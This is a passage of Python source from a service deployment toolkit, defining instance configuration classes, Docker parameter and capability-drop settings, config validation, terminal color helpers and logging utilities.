INSTANCE_TYPES_WITH_SET_STATE = {"flink"}
class RollbackTypes(Enum):
AUTOMATIC_SLO_ROLLBACK = "automatic_slo_rollback"
USER_INITIATED_ROLLBACK = "user_initiated_rollback"
class TimeCacheEntry(TypedDict):
data: Any
fetch_time: float
_CacheRetT = TypeVar("_CacheRetT")
class time_cache:
def __init__(self, ttl: float = 0) -> None:
self.configs: Dict[Tuple, TimeCacheEntry] = {}
self.ttl = ttl
def __call__(self, f: Callable[..., _CacheRetT]) -> Callable[..., _CacheRetT]:
def cache(*args: Any, **kwargs: Any) -> _CacheRetT:
if "ttl" in kwargs:
ttl = kwargs["ttl"]
del kwargs["ttl"]
else:
ttl = self.ttl
key = args
for item in kwargs.items():
key += item
if (
(not ttl)
or (key not in self.configs)
or (time.time() - self.configs[key]["fetch_time"] > ttl)
):
self.configs[key] = {
"data": f(*args, **kwargs),
"fetch_time": time.time(),
}
return self.configs[key]["data"]
return cache
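# Illustrative usage of time_cache (not part of the original module): results are
# memoized per argument tuple for `ttl` seconds; with the default ttl of 0 every
# call is re-evaluated, and callers may pass ttl=... at call time to override it.
#
#     @time_cache(ttl=30)
#     def expensive_lookup(name: str) -> str:
#         return name.upper()
#
#     expensive_lookup("foo")  # computed and cached
#     expensive_lookup("foo")  # served from the cache for up to 30 seconds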
_SortDictsT = TypeVar("_SortDictsT", bound=Mapping)
def sort_dicts(dcts: Iterable[_SortDictsT]) -> List[_SortDictsT]:
def key(dct: _SortDictsT) -> Tuple:
return tuple(sorted(dct.items()))
return sorted(dcts, key=key)
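# Example (illustrative values): sort_dicts orders mappings by their sorted
# (key, value) pairs, so sort_dicts([{"b": 2, "a": 1}, {"a": 0}]) returns
# [{"a": 0}, {"a": 1, "b": 2}].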
class InvalidInstanceConfig(Exception):
pass
DeployBlacklist = List[Tuple[str, str]]
DeployWhitelist = Optional[Tuple[str, List[str]]]
# The actual config files will have lists, since tuples are not expressible in base YAML, so we define different types
# here to represent that. The getter functions will convert to the safe versions above.
UnsafeDeployBlacklist = Optional[Sequence[Sequence[str]]]
UnsafeDeployWhitelist = Optional[Sequence[Union[str, Sequence[str]]]]
Constraint = Sequence[str]
# e.g. ['GROUP_BY', 'habitat', 2]. Marathon doesn't like that so we'll convert to Constraint later.
UnstringifiedConstraint = Sequence[Union[str, int, float]]
SecurityConfigDict = Dict # Todo: define me.
class VolumeWithMode(TypedDict):
mode: str
class DockerVolume(VolumeWithMode):
hostPath: str
containerPath: str
class AwsEbsVolume(VolumeWithMode):
volume_id: str
fs_type: str
partition: int
container_path: str
class PersistentVolume(VolumeWithMode):
size: int
container_path: str
storage_class_name: str
class InstanceConfigDict(TypedDict, total=False):
deploy_group: str
mem: float
cpus: float
disk: float
cmd: str
args: List[str]
cfs_period_us: float
cpu_burst_add: float
cap_add: List
env: Dict[str, str]
monitoring: Dict[str, str]
deploy_blacklist: UnsafeDeployBlacklist
deploy_whitelist: UnsafeDeployWhitelist
pool: str
persistent_volumes: List[PersistentVolume]
role: str
extra_volumes: List[DockerVolume]
aws_ebs_volumes: List[AwsEbsVolume]
security: SecurityConfigDict
dependencies_reference: str
dependencies: Dict[str, Dict]
constraints: List[UnstringifiedConstraint]
extra_constraints: List[UnstringifiedConstraint]
net: str
extra_docker_args: Dict[str, str]
gpus: int
branch: str
class BranchDictV1(TypedDict, total=False):
docker_image: str
desired_state: str
force_bounce: Optional[str]
class BranchDictV2(TypedDict):
git_sha: str
docker_image: str
desired_state: str
force_bounce: Optional[str]
class DockerParameter(TypedDict):
key: str
value: str
def safe_deploy_blacklist(input: UnsafeDeployBlacklist) -> DeployBlacklist:
return [(t, loc) for t, loc in input]
def safe_deploy_whitelist(input: UnsafeDeployWhitelist) -> DeployWhitelist:
try:
location_type, allowed_values = input
return cast(str, location_type), cast(List[str], allowed_values)
except TypeError:
return None
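# Example (illustrative values): safe_deploy_blacklist([["region", "uswest1-prod"]])
# yields [("region", "uswest1-prod")], while safe_deploy_whitelist(None) returns
# None because unpacking None raises TypeError, which is caught above.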
# For mypy typing
InstanceConfig_T = TypeVar("InstanceConfig_T", bound="InstanceConfig")
class InstanceConfig:
config_filename_prefix: str
def __init__(
self,
cluster: str,
instance: str,
service: str,
config_dict: InstanceConfigDict,
branch_dict: Optional[BranchDictV2],
soa_dir: str = DEFAULT_SOA_DIR,
) -> None:
self.config_dict = config_dict
self.branch_dict = branch_dict
self.cluster = cluster
self.instance = instance
self.service = service
self.soa_dir = soa_dir
self._job_id = compose_job_id(service, instance)
config_interpolation_keys = ("deploy_group",)
interpolation_facts = self.__get_interpolation_facts()
for key in config_interpolation_keys:
if (
key in self.config_dict
and self.config_dict[key] is not None # type: ignore
):
self.config_dict[key] = self.config_dict[key].format( # type: ignore
**interpolation_facts
)
def __repr__(self) -> str:
return "{!s}({!r}, {!r}, {!r}, {!r}, {!r}, {!r})".format(
self.__class__.__name__,
self.service,
self.instance,
self.cluster,
self.config_dict,
self.branch_dict,
self.soa_dir,
)
def __get_interpolation_facts(self) -> Dict[str, str]:
return {
"cluster": self.cluster,
"instance": self.instance,
"service": self.service,
}
def get_cluster(self) -> str:
return self.cluster
def get_instance(self) -> str:
return self.instance
def get_service(self) -> str:
return self.service
@property
def job_id(self) -> str:
return self._job_id
def get_docker_registry(self) -> str:
return get_service_docker_registry(self.service, self.soa_dir)
def get_branch(self) -> str:
return get_paasta_branch(
cluster=self.get_cluster(), instance=self.get_instance()
)
def get_deploy_group(self) -> str:
return self.config_dict.get("deploy_group", self.get_branch())
def get_team(self) -> str:
return self.config_dict.get("monitoring", {}).get("team", None)
def get_mem(self) -> float:
"""Gets the memory required from the service's configuration.
Defaults to 1024 (1G) if no value specified in the config.
:returns: The amount of memory specified by the config, 1024 if not specified"""
mem = self.config_dict.get("mem", 1024)
return mem
def get_mem_swap(self) -> str:
"""Gets the memory-swap value. This value is passed to the docker
container to ensure that the total memory limit (memory + swap) is the
same value as the 'mem' key in soa-configs. Note - this value *has* to
be >= the mem key, so we always round up to the closest MB and add an
additional 64MB for the docker executor (See PAASTA-12450).
"""
mem = self.get_mem()
mem_swap = int(math.ceil(mem + 64))
return "%sm" % mem_swap
def get_cpus(self) -> float:
"""Gets the number of cpus required from the service's configuration.
Defaults to .25 (1/4 of a cpu) if no value specified in the config.
:returns: The number of cpus specified in the config, .25 if not specified"""
cpus = self.config_dict.get("cpus", 0.25)
return cpus
def get_cpu_burst_add(self) -> float:
"""Returns the number of additional cpus a container is allowed to use.
Defaults to DEFAULT_CPU_BURST_ADD"""
return self.config_dict.get("cpu_burst_add", DEFAULT_CPU_BURST_ADD)
def get_cpu_period(self) -> float:
"""The --cpu-period option to be passed to docker
Comes from the cfs_period_us configuration option
:returns: The number to be passed to the --cpu-period docker flag"""
return self.config_dict.get("cfs_period_us", DEFAULT_CPU_PERIOD)
def get_cpu_quota(self) -> float:
"""Gets the --cpu-quota option to be passed to docker
Calculation: (cpus + cpus_burst_add) * cfs_period_us
:returns: The number to be passed to the --cpu-quota docker flag"""
cpu_burst_add = self.get_cpu_burst_add()
return (self.get_cpus() + cpu_burst_add) * self.get_cpu_period()
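# Illustrative calculation (not executed): with cpus=0.25 and the default
# cpu_burst_add of 1 and cfs_period_us of 100000, the quota is
# (0.25 + 1) * 100000 == 125000.0, which format_docker_parameters below
# truncates to 125000 for the --cpu-quota docker flag.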
def get_extra_docker_args(self) -> Dict[str, str]:
return self.config_dict.get("extra_docker_args", {})
def get_cap_add(self) -> Iterable[DockerParameter]:
"""Get the --cap-add options to be passed to docker
Generated from the cap_add configuration option, which is a list of
capabilities.
Example configuration: {'cap_add': ['IPC_LOCK', 'SYS_PTRACE']}
:returns: A generator of cap_add options to be passed as --cap-add flags"""
for value in self.config_dict.get("cap_add", []):
yield {"key": "cap-add", "value": f"{value}"}
def get_cap_drop(self) -> Iterable[DockerParameter]:
"""Generates --cap-drop options to be passed to docker by default, which
makes them not able to perform special privilege escalation stuff
https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities
"""
caps = [
"SETPCAP",
"MKNOD",
"AUDIT_WRITE",
"CHOWN",
"NET_RAW",
"DAC_OVERRIDE",
"FOWNER",
"FSETID",
"KILL",
"SETGID",
"SETUID",
"NET_BIND_SERVICE",
"SYS_CHROOT",
"SETFCAP",
]
for cap in caps:
yield {"key": "cap-drop", "value": cap}
def format_docker_parameters(
self, with_labels: bool = True
) -> List[DockerParameter]:
"""Formats extra flags for running docker. Will be added in the format
`["--%s=%s" % (e['key'], e['value']) for e in list]` to the `docker run` command
Note: values must be strings
:param with_labels: Whether to build docker parameters with or without labels
:returns: A list of parameters to be added to docker run"""
parameters: List[DockerParameter] = [
{"key": "memory-swap", "value": self.get_mem_swap()},
{"key": "cpu-period", "value": "%s" % int(self.get_cpu_period())},
{"key": "cpu-quota", "value": "%s" % int(self.get_cpu_quota())},
]
if self.use_docker_disk_quota():
parameters.append(
{
"key": "storage-opt",
"value": f"size={int(self.get_disk() * 1024 * 1024)}",
}
)
if with_labels:
parameters.extend(
[
{"key": "label", "value": "paasta_service=%s" % self.service},
{"key": "label", "value": "paasta_instance=%s" % self.instance},
]
)
extra_docker_args = self.get_extra_docker_args()
if extra_docker_args:
for key, value in extra_docker_args.items():
parameters.extend([{"key": key, "value": value}])
parameters.extend(self.get_cap_add())
parameters.extend(self.get_docker_init())
parameters.extend(self.get_cap_drop())
return parameters
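# Illustrative rendering (assumption: callers follow the format described in the
# docstring above): each DockerParameter becomes "--%s=%s" % (key, value), so
# {"key": "label", "value": "paasta_service=foo"} ends up as
# "--label=paasta_service=foo" on the docker run command line.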
def use_docker_disk_quota(self) -> bool:
return load_system_paasta_config().get_enforce_disk_quota()
def get_docker_init(self) -> Iterable[DockerParameter]:
return [{"key": "init", "value": "true"}]
def get_disk(self, default: float = 1024) -> float:
"""Gets the amount of disk space in MiB required from the service's configuration.
Defaults to 1024 (1GiB) if no value is specified in the config.
:returns: The amount of disk space specified by the config, 1024 MiB if not specified"""
disk = self.config_dict.get("disk", default)
return disk
def get_gpus(self) -> Optional[int]:
"""Gets the number of gpus required from the service's configuration.
Default to None if no value is specified in the config.
:returns: The number of gpus specified by the config, None if not specified"""
gpus = self.config_dict.get("gpus", None)
return gpus
def get_container_type(self) -> Optional[str]:
"""Get Mesos containerizer type.
Default to DOCKER if gpus are not used.
:returns: Mesos containerizer type, DOCKER or MESOS"""
if self.get_gpus() is not None:
container_type = "MESOS"
else:
container_type = "DOCKER"
return container_type
def get_cmd(self) -> Optional[Union[str, List[str]]]:
"""Get the docker cmd specified in the service's configuration.
Defaults to None if not specified in the config.
:returns: A string specified in the config, None if not specified"""
return self.config_dict.get("cmd", None)
def get_instance_type(self) -> Optional[str]:
return getattr(self, "config_filename_prefix", None)
def get_env_dictionary(self) -> Dict[str, str]:
"""A dictionary of key/value pairs that represent environment variables
to be injected to the container environment"""
env = {
"PAASTA_SERVICE": self.service,
"PAASTA_INSTANCE": self.instance,
"PAASTA_CLUSTER": self.cluster,
"PAASTA_DEPLOY_GROUP": self.get_deploy_group(),
"PAASTA_DOCKER_IMAGE": self.get_docker_image(),
"PAASTA_RESOURCE_CPUS": str(self.get_cpus()),
"PAASTA_RESOURCE_MEM": str(self.get_mem()),
"PAASTA_RESOURCE_DISK": str(self.get_disk()),
}
if self.get_gpus() is not None:
env["PAASTA_RESOURCE_GPUS"] = str(self.get_gpus())
try:
env["PAASTA_GIT_SHA"] = get_git_sha_from_dockerurl(self.get_docker_url())
except Exception:
pass
team = self.get_team()
if team:
env["PAASTA_MONITORING_TEAM"] = team
instance_type = self.get_instance_type()
if instance_type:
env["PAASTA_INSTANCE_TYPE"] = instance_type
user_env = self.config_dict.get("env", {})
env.update(user_env)
return {str(k): str(v) for (k, v) in env.items()}
def get_env(self) -> Dict[str, str]:
"""Basic get_env that simply returns the basic env, other classes
might need to override this getter for more implementation-specific
env getting"""
return self.get_env_dictionary()
def get_args(self) -> Optional[List[str]]:
"""Get the docker args specified in the service's configuration.
If not specified in the config and if cmd is not specified, defaults to an empty array.
If not specified in the config but cmd is specified, defaults to None.
If specified in the config and cmd is also specified, raises an exception. Only one may be specified.
:param service_config: The service instance's configuration dictionary
:returns: An array of args specified in the config,
``[]`` if not specified and if cmd is not specified,
otherwise None if not specified but cmd is specified"""
if self.get_cmd() is None:
return self.config_dict.get("args", [])
else:
args = self.config_dict.get("args", None)
if args is None:
return args
else:
# TODO validation stuff like this should be moved into a check_*
raise InvalidInstanceConfig(
"Instance configuration can specify cmd or args, but not both."
)
def get_monitoring(self) -> Dict[str, Any]:
"""Get monitoring overrides defined for the given instance"""
return self.config_dict.get("monitoring", {})
def get_deploy_constraints(
self,
blacklist: DeployBlacklist,
whitelist: DeployWhitelist,
system_deploy_blacklist: DeployBlacklist,
system_deploy_whitelist: DeployWhitelist,
) -> List[Constraint]:
"""Return the combination of deploy_blacklist and deploy_whitelist
as a list of constraints.
"""
return (
deploy_blacklist_to_constraints(blacklist)
+ deploy_whitelist_to_constraints(whitelist)
+ deploy_blacklist_to_constraints(system_deploy_blacklist)
+ deploy_whitelist_to_constraints(system_deploy_whitelist)
)
def get_deploy_blacklist(self) -> DeployBlacklist:
"""The deploy blacklist is a list of lists, where the lists indicate
which locations the service should not be deployed"""
return safe_deploy_blacklist(self.config_dict.get("deploy_blacklist", []))
def get_deploy_whitelist(self) -> DeployWhitelist:
"""The deploy whitelist is a tuple of (location_type, [allowed value, allowed value, ...]).
To have tasks scheduled on it, a host must be covered by the deploy whitelist (if present) and not excluded by
the deploy blacklist."""
return safe_deploy_whitelist(self.config_dict.get("deploy_whitelist"))
def get_docker_image(self) -> str:
"""Get the docker image name (with tag) for a given service branch from
a generated deployments.json file."""
if self.branch_dict is not None:
return self.branch_dict["docker_image"]
else:
return ""
def get_docker_url(self) -> str:
"""Compose the docker url.
:returns: '<registry_uri>/<docker_image>'
"""
registry_uri = self.get_docker_registry()
docker_image = self.get_docker_image()
if not docker_image:
raise NoDockerImageError(
"Docker url not available because there is no docker_image"
)
docker_url = f"{registry_uri}/{docker_image}"
return docker_url
def get_desired_state(self) -> str:
"""Get the desired state (either 'start' or 'stop') for a given service
branch from a generated deployments.json file."""
if self.branch_dict is not None:
return self.branch_dict["desired_state"]
else:
return "start"
def get_force_bounce(self) -> Optional[str]:
"""Get the force_bounce token for a given service branch from a generated
deployments.json file. This is a token that, when changed, indicates that
the instance should be recreated and bounced, even if no other
parameters have changed. This may be None or a string, generally a
timestamp.
"""
if self.branch_dict is not None:
return self.branch_dict["force_bounce"]
else:
return None
def check_cpus(self) -> Tuple[bool, str]:
cpus = self.get_cpus()
if cpus is not None:
if not isinstance(cpus, (float, int)):
return (
False,
'The specified cpus value "%s" is not a valid float or int.' % cpus,
)
return True, ""
def check_mem(self) -> Tuple[bool, str]:
mem = self.get_mem()
if mem is not None:
if not isinstance(mem, (float, int)):
return (
False,
'The specified mem value "%s" is not a valid float or int.' % mem,
)
return True, ""
def check_disk(self) -> Tuple[bool, str]:
disk = self.get_disk()
if disk is not None:
if not isinstance(disk, (float, int)):
return (
False,
'The specified disk value "%s" is not a valid float or int.' % disk,
)
return True, ""
def check_security(self) -> Tuple[bool, str]:
security = self.config_dict.get("security")
if security is None:
return True, ""
outbound_firewall = security.get("outbound_firewall")
if outbound_firewall is None:
return True, ""
if outbound_firewall not in ("block", "monitor"):
return (
False,
'Unrecognized outbound_firewall value "%s"' % outbound_firewall,
)
unknown_keys = set(security.keys()) - {"outbound_firewall"}
if unknown_keys:
return (
False,
'Unrecognized items in security dict of service config: "%s"'
% ",".join(unknown_keys),
)
return True, ""
def check_dependencies_reference(self) -> Tuple[bool, str]:
dependencies_reference = self.config_dict.get("dependencies_reference")
if dependencies_reference is None:
return True, ""
dependencies = self.config_dict.get("dependencies")
if dependencies is None:
return (
False,
'dependencies_reference "%s" declared but no dependencies found'
% dependencies_reference,
)
if dependencies_reference not in dependencies:
return (
False,
'dependencies_reference "%s" not found in dependencies dictionary'
% dependencies_reference,
)
return True, ""
def check(self, param: str) -> Tuple[bool, str]:
check_methods = {
"cpus": self.check_cpus,
"mem": self.check_mem,
"security": self.check_security,
"dependencies_reference": self.check_dependencies_reference,
"deploy_group": self.check_deploy_group,
}
check_method = check_methods.get(param)
if check_method is not None:
return check_method()
else:
return (
False,
'Your service config specifies "%s", an unsupported parameter.' % param,
)
def validate(
self,
params: List[str] = [
"cpus",
"mem",
"security",
"dependencies_reference",
"deploy_group",
],
) -> List[str]:
error_msgs = []
for param in params:
check_passed, check_msg = self.check(param)
if not check_passed:
error_msgs.append(check_msg)
return error_msgs
def check_deploy_group(self) -> Tuple[bool, str]:
deploy_group = self.get_deploy_group()
if deploy_group is not None:
pipeline_deploy_groups = get_pipeline_deploy_groups(
service=self.service, soa_dir=self.soa_dir
)
if deploy_group not in pipeline_deploy_groups:
return (
False,
f"{self.service}.{self.instance} uses deploy_group {deploy_group}, but it is not deploy.yaml",
) # noqa: E501
return True, ""
def get_extra_volumes(self) -> List[DockerVolume]:
"""Extra volumes are a specially formatted list of dictionaries that should
be bind mounted in a container. The format of the dictionaries should
conform to the `Mesos container volumes spec
<https://mesosphere.github.io/marathon/docs/native-docker.html>`_"""
return self.config_dict.get("extra_volumes", [])
def get_aws_ebs_volumes(self) -> List[AwsEbsVolume]:
return self.config_dict.get("aws_ebs_volumes", [])
def get_role(self) -> Optional[str]:
"""Which mesos role of nodes this job should run on.
"""
return self.config_dict.get("role")
def get_pool(self) -> str:
"""Which pool of nodes this job should run on. This can be used to mitigate noisy neighbors, by putting
particularly noisy or noise-sensitive jobs into different pools.
This is implemented with an attribute "pool" on each mesos slave and by adding a constraint to Marathon/Chronos
application defined by this instance config.
Eventually this may be implemented with Mesos roles, once a framework can register under multiple roles.
:returns: the "pool" attribute in your config dict, or the string "default" if not specified."""
return self.config_dict.get("pool", "default")
def get_pool_constraints(self) -> List[Constraint]:
pool = self.get_pool()
return [["pool", "LIKE", pool]]
def get_constraints(self) -> Optional[List[Constraint]]:
return stringify_constraints(self.config_dict.get("constraints", None))
def get_extra_constraints(self) -> List[Constraint]:
return stringify_constraints(self.config_dict.get("extra_constraints", []))
def get_net(self) -> str:
"""
:returns: the docker networking mode the container should be started with.
"""
return self.config_dict.get("net", "bridge")
def get_volumes(self, system_volumes: Sequence[DockerVolume]) -> List[DockerVolume]:
volumes = list(system_volumes) + list(self.get_extra_volumes())
deduped = {
v["containerPath"].rstrip("/") + v["hostPath"].rstrip("/"): v
for v in volumes
}.values()
return sort_dicts(deduped)
def get_persistent_volumes(self) -> Sequence[PersistentVolume]:
return self.config_dict.get("persistent_volumes", [])
def get_dependencies_reference(self) -> Optional[str]:
"""Get the reference to an entry in dependencies.yaml
Defaults to None if not specified in the config.
:returns: A string specified in the config, None if not specified"""
return self.config_dict.get("dependencies_reference")
def get_dependencies(self) -> Optional[Dict]:
"""Get the contents of the dependencies_dict pointed to by the dependency_reference or
'main' if no dependency_reference exists
Defaults to None if not specified in the config.
:returns: A list of dictionaries specified in the dependencies_dict, None if not specified"""
dependencies = self.config_dict.get("dependencies")
if not dependencies:
return None
dependency_ref = self.get_dependencies_reference() or "main"
return dependencies.get(dependency_ref)
def get_outbound_firewall(self) -> Optional[str]:
"""Return 'block', 'monitor', or None as configured in security->outbound_firewall
Defaults to None if not specified in the config
:returns: A string specified in the config, None if not specified"""
security = self.config_dict.get("security")
if not security:
return None
return security.get("outbound_firewall")
def __eq__(self, other: Any) -> bool:
if isinstance(other, type(self)):
return (
self.config_dict == other.config_dict
and self.branch_dict == other.branch_dict
and self.cluster == other.cluster
and self.instance == other.instance
and self.service == other.service
)
else:
return False
def stringify_constraint(usc: UnstringifiedConstraint) -> Constraint:
return [str(x) for x in usc]
def stringify_constraints(
uscs: Optional[List[UnstringifiedConstraint]],
) -> List[Constraint]:
if uscs is None:
return None
return [stringify_constraint(usc) for usc in uscs]
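# Example (illustrative): stringify_constraint(["GROUP_BY", "habitat", 2]) returns
# ["GROUP_BY", "habitat", "2"], the Marathon-friendly form described in the
# UnstringifiedConstraint comment above.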
@time_cache(ttl=60)
def validate_service_instance(
service: str, instance: str, cluster: str, soa_dir: str
) -> str:
possibilities: List[str] = []
for instance_type in INSTANCE_TYPES:
sis = get_service_instance_list(
service=service,
cluster=cluster,
instance_type=instance_type,
soa_dir=soa_dir,
)
if (service, instance) in sis:
return instance_type
possibilities.extend(si[1] for si in sis)
else:
suggestions = suggest_possibilities(word=instance, possibilities=possibilities)
raise NoConfigurationForServiceError(
f"Error: {compose_job_id(service, instance)} doesn't look like it has been configured "
f"to run on the {cluster} cluster.{suggestions}"
)
_ComposeRetT = TypeVar("_ComposeRetT")
_ComposeInnerRetT = TypeVar("_ComposeInnerRetT")
def compose(
func_one: Callable[[_ComposeInnerRetT], _ComposeRetT],
func_two: Callable[..., _ComposeInnerRetT],
) -> Callable[..., _ComposeRetT]:
def composed(*args: Any, **kwargs: Any) -> _ComposeRetT:
return func_one(func_two(*args, **kwargs))
return composed
class PaastaColors:
"""Collection of static variables and methods to assist in coloring text."""
# ANSI color codes
BLUE = "\033[34m"
BOLD = "\033[1m"
CYAN = "\033[36m"
DEFAULT = "\033[0m"
GREEN = "\033[32m"
GREY = "\033[38;5;242m"
MAGENTA = "\033[35m"
RED = "\033[31m"
YELLOW = "\033[33m"
@staticmethod
def bold(text: str) -> str:
"""Return bolded text.
:param text: a string
:return: text color coded with ANSI bold
"""
return PaastaColors.color_text(PaastaColors.BOLD, text)
@staticmethod
def blue(text: str) -> str:
"""Return text that can be printed blue.
:param text: a string
:return: text color coded with ANSI blue
"""
return PaastaColors.color_text(PaastaColors.BLUE, text)
@staticmethod
def green(text: str) -> str:
"""Return text that can be printed green.
:param text: a string
:return: text color coded with ANSI green"""
return PaastaColors.color_text(PaastaColors.GREEN, text)
@staticmethod
def red(text: str) -> str:
"""Return text that can be printed red.
:param text: a string
:return: text color coded with ANSI red"""
return PaastaColors.color_text(PaastaColors.RED, text)
@staticmethod
def magenta(text: str) -> str:
"""Return text that can be printed magenta.
:param text: a string
:return: text color coded with ANSI magenta"""
return PaastaColors.color_text(PaastaColors.MAGENTA, text)
@staticmethod
def color_text(color: str, text: str) -> str:
"""Return text that can be printed color.
:param color: ANSI color code
:param text: a string
:return: a string with ANSI color encoding"""
# any time text returns to default, we want to insert our color.
replaced = text.replace(PaastaColors.DEFAULT, PaastaColors.DEFAULT + color)
# then wrap the beginning and end in our color/default.
return color + replaced + PaastaColors.DEFAULT
@staticmethod
def cyan(text: str) -> str:
"""Return text that can be printed cyan.
:param text: a string
:return: text color coded with ANSI cyan"""
return PaastaColors.color_text(PaastaColors.CYAN, text)
@staticmethod
def yellow(text: str) -> str:
"""Return text that can be printed yellow.
:param text: a string
:return: text color coded with ANSI yellow"""
return PaastaColors.color_text(PaastaColors.YELLOW, text)
@staticmethod
def grey(text: str) -> str:
return PaastaColors.color_text(PaastaColors.GREY, text)
@staticmethod
def default(text: str) -> str:
return PaastaColors.color_text(PaastaColors.DEFAULT, text)
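# Illustrative behaviour of color_text (not part of the original module): nested
# colors survive because every reset (DEFAULT) inside the text is re-prefixed with
# the outer color, e.g.
#
#     PaastaColors.red("error: " + PaastaColors.bold("boom"))
#
# keeps the surrounding text red after the bold segment ends.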
LOG_COMPONENTS = OrderedDict(
[
(
"build",
{
"color": PaastaColors.blue,
"help": "Jenkins build jobs output, like the itest, promotion, security checks, etc.",
"source_env": "devc",
},
),
(
"deploy",
{
"color": PaastaColors.cyan,
"help": "Output from the paasta deploy code. (setup_marathon_job, bounces, etc)",
"additional_source_envs": ["devc"],
},
),
(
"monitoring",
{
"color": PaastaColors.green,
"help": "Logs from Sensu checks for the service",
},
),
(
"marathon",
{
"color": PaastaColors.magenta,
"help": "Logs from Marathon for the service",
},
),
(
"app_output",
{
"color": compose(PaastaColors.yellow, PaastaColors.bold),
"help": "Stderr and stdout of the actual process spawned by Mesos. "
"Convenience alias for both the stdout and stderr components",
},
),
(
"stdout",
{
"color": PaastaColors.yellow,
"help": "Stdout from the process spawned by Mesos.",
},
),
(
"stderr",
{
"color": PaastaColors.yellow,
"help": "Stderr from the process spawned by Mesos.",
},
),
(
"security",
{
"color": PaastaColors.red,
"help": "Logs from security-related services such as firewall monitoring",
},
),
("oom", {"color": PaastaColors.red, "help": "Kernel OOM events."}),
# I'm leaving these planned components here since they provide some hints
# about where we want to go. See PAASTA-78.
#
# But I'm commenting them out so they don't delude users into believing we
# can expose logs that we cannot actually expose. See PAASTA-927.
#
# ('app_request', {
# 'color': PaastaColors.bold,
# 'help': 'The request log for the service. Defaults to "service_NAME_requests"',
# 'command': 'scribe_reader -e ENV -f service_example_happyhour_requests',
# }),
# ('app_errors', {
# 'color': PaastaColors.red,
# 'help': 'Application error log, defaults to "stream_service_NAME_errors"',
# 'command': 'scribe_reader -e ENV -f stream_service_SERVICE_errors',
# }),
# ('lb_requests', {
# 'color': PaastaColors.bold,
# 'help': 'All requests from Smartstack haproxy',
# 'command': 'NA - TODO: SRV-1130',
# }),
# ('lb_errors', {
# 'color': PaastaColors.red,
# 'help': 'Logs from Smartstack haproxy that have 400-500 error codes',
# 'command': 'scribereader -e ENV -f stream_service_errors | grep SERVICE.instance',
# }),
]
)
class NoSuchLogComponent(Exception):
pass
def validate_log_component(component: str) -> bool:
if component in LOG_COMPONENTS.keys():
return True
else:
raise NoSuchLogComponent
def get_git_url(service: str, soa_dir: str = DEFAULT_SOA_DIR) -> str:
"""Get the git url for a service. Assumes that the service's
repo matches its name, and that it lives in services- i.e.
if this is called with the string 'test', the returned
url will be git@git.yelpcorp.com:services/test.
:param service: The service name to get a URL for
:returns: A git url to the service's repository"""
general_config = service_configuration_lib.read_service_configuration(
service, soa_dir=soa_dir
)
default_location = "git@git.yelpcorp.com:services/%s" % service
return general_config.get("git_url", default_location)
def get_service_docker_registry(
service: str,
soa_dir: str = DEFAULT_SOA_DIR,
system_config: Optional["SystemPaastaConfig"] = None,
) -> str:
if service is None:
raise NotImplementedError('"None" is not a valid service')
service_configuration = service_configuration_lib.read_service_configuration(
service, soa_dir
)
try:
return service_configuration["docker_registry"]
except KeyError:
if not system_config:
system_config = load_system_paasta_config()
return system_config.get_system_docker_registry()
class NoSuchLogLevel(Exception):
pass
class LogWriterConfig(TypedDict):
driver: str
options: Dict
class LogReaderConfig(TypedDict):
driver: str
options: Dict
# The active log writer.
_log_writer = None
# The map of name -> LogWriter subclasses, used by configure_log.
_log_writer_classes = {}
class LogWriter:
def __init__(self, **kwargs: Any) -> None:
pass
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
raise NotImplementedError()
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
raise NotImplementedError()
_LogWriterTypeT = TypeVar("_LogWriterTypeT", bound=Type[LogWriter])
def register_log_writer(name: str) -> Callable[[_LogWriterTypeT], _LogWriterTypeT]:
"""Returns a decorator that registers that log writer class at a given name
so get_log_writer_class can find it."""
def outer(log_writer_class: _LogWriterTypeT) -> _LogWriterTypeT:
_log_writer_classes[name] = log_writer_class
return log_writer_class
return outer
def get_log_writer_class(name: str) -> Type[LogWriter]:
return _log_writer_classes[name]
def list_log_writers() -> Iterable[str]:
return _log_writer_classes.keys()
def configure_log() -> None:
"""We will log to the yocalhost binded scribe."""
log_writer_config = load_system_paasta_config().get_log_writer()
global _log_writer
LogWriterClass = get_log_writer_class(log_writer_config["driver"])
_log_writer = LogWriterClass(**log_writer_config.get("options", {}))
def _log(
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
if _log_writer is None:
configure_log()
return _log_writer.log(
service=service,
line=line,
component=component,
level=level,
cluster=cluster,
instance=instance,
)
def _log_audit(
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
if _log_writer is None:
configure_log()
user = get_username()
host = get_hostname()
return _log_writer.log_audit(
user=user,
host=host,
action=action,
action_details=action_details,
service=service,
cluster=cluster,
instance=instance,
)
def _now() -> str:
return datetime.datetime.utcnow().isoformat()
def remove_ansi_escape_sequences(line: str) -> str:
"""Removes ansi escape sequences from the given line."""
return no_escape.sub("", line)
def format_log_line(
level: str,
cluster: str,
service: str,
instance: str,
component: str,
line: str,
timestamp: str = None,
) -> str:
"""Accepts a string 'line'.
Returns an appropriately-formatted dictionary which can be serialized to
JSON for logging and which contains 'line'.
"""
validate_log_component(component)
if not timestamp:
timestamp = _now()
line = remove_ansi_escape_sequences(line.strip())
message = json.dumps(
{
"timestamp": timestamp,
"level": level,
"cluster": cluster,
"service": service,
"instance": instance,
"component": component,
"message": line,
},
sort_keys=True,
)
return message
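# Illustrative output (all field values here are made-up examples): format_log_line
# serializes to a flat JSON object with sorted keys and ANSI escapes stripped from
# the message, e.g.
#
#     {"cluster": "norcal-devc", "component": "deploy", "instance": "main",
#      "level": "event", "message": "bounced", "service": "foo",
#      "timestamp": "2020-01-01T00:00:00"}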
def format_audit_log_line(
cluster: str,
instance: str,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
timestamp: str = None,
) -> str:
"""Accepts:
* a string 'user' describing the user that initiated the action
* a string 'host' describing the server where the user initiated the action
* a string 'action' describing an action performed by paasta_tools
* a dict 'action_details' optional information about the action
Returns an appropriately-formatted dictionary which can be serialized to
JSON for logging and which contains details about an action performed on
a service/instance.
"""
if not timestamp:
timestamp = _now()
if not action_details:
action_details = {}
message = json.dumps(
